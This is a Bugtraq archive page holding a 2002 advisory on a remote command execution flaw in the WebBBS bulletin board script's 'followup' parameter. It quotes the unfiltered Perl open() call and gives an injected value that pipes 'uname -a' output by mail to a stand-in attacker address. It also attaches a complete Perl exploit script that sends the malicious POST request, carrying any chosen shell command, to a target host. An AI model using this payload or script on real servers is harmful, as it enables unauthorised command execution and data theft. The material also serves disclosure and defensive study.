Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

WebBBS 5.0 (andlater versions) vulnerable: allow commands execution via "followup" bug

From: nerf gr0up nerf <vipersv () mail ru>
Date: 18 Jun 2002 18:39:58 -0000


                --== Nerf gr0up: adv #7 ==--  
                     WebBBS remote command execution

Vulnerable:
WebBBS by Darryl Burgdorf 
(http://awsd.com/scripts/webbbs/).
All versions are vulnerable.
WebBBS is a Web-based bulletin board. WebBBS stores 
messages as simple text files.

Description:
WebBBS script allows command execution on server.
This script does no filtering and due to this
remote command execution is possible.

The vulnerable code is shown below:
-----
webbbs_post.pl: 

...
if ($FORM{'followup'}) { $followup = 
"$FORM{'followup'}"; }
...
if ($followup) {
...
                $subdir = "bbs".int($followup/1000);
                open 
(FOLLOWUP,"$dir/$subdir/$followup");
...
-----

Just change the value of $followup variable, e.g 
"followup=10" to 
"followup=10;uname -a|mail zlo () evil com|" to exploit 
this vulnerability.

btr
nerf
www.nerf.ru

Attach (exploit in perl):

#!/usr/bin/perl
#
#  nerF gr0up
#
#  exploit code for
#  WebBBS by Darryl C. Burgdorf
#  all version up to 5.00 are vulnerable
#
#
#  this is an exploitation of "followup" bug.
#  it allows remote attacker to execute shell 
commands.
#  you can find WebBBS script at 
http://awsd.com/scripts/webbbs/
#
#  06.06.2002
#  btr // nerf
# nerf.ru

use IO::Socket;

        srand();
        $script = "/cgi-bin/webbbs/webbbs_config.pl";
        $command = "uname -a|mail zlo () evil com";
        $host = "localhost";
        $port = 80;

        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . 
rand(254);
        $content = "$content" . "&body=" . rand(254);
        
$content="$content"."&followup=".rand(254)."|$command|";

        $content_length = length($content);
        $content_type = 
"application/x-www-form-urlencoded";

        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post 
HTTP/1.0\n";
        $buf = "$buf" . "Content-Type: 
$content_type\r\nContent-Length:";
        $buf = "$buf" . 
"$content_length\r\n\r\n$content", 0;

        print "\tnerF gr0up\n";
        print "exploit: WebBBS (awsd.com), version up 
to 5.00\n";

        print "sent:\n$buf\n";

if($socket = IO::Socket::INET->new("$host:$port")){

        print $socket "$buf";
        read($socket,$buf,1500);
        print "recieved:\n$buf\n";
}
Previous By Date Next
Previous By Thread Next

Current thread: